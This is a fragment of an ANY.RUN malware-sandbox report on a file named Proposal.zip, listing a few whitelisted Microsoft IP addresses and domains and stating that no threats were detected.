  • 20.73.194.208
whitelisted
arc.msn.com
  • 20.199.58.43
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Proposal.zip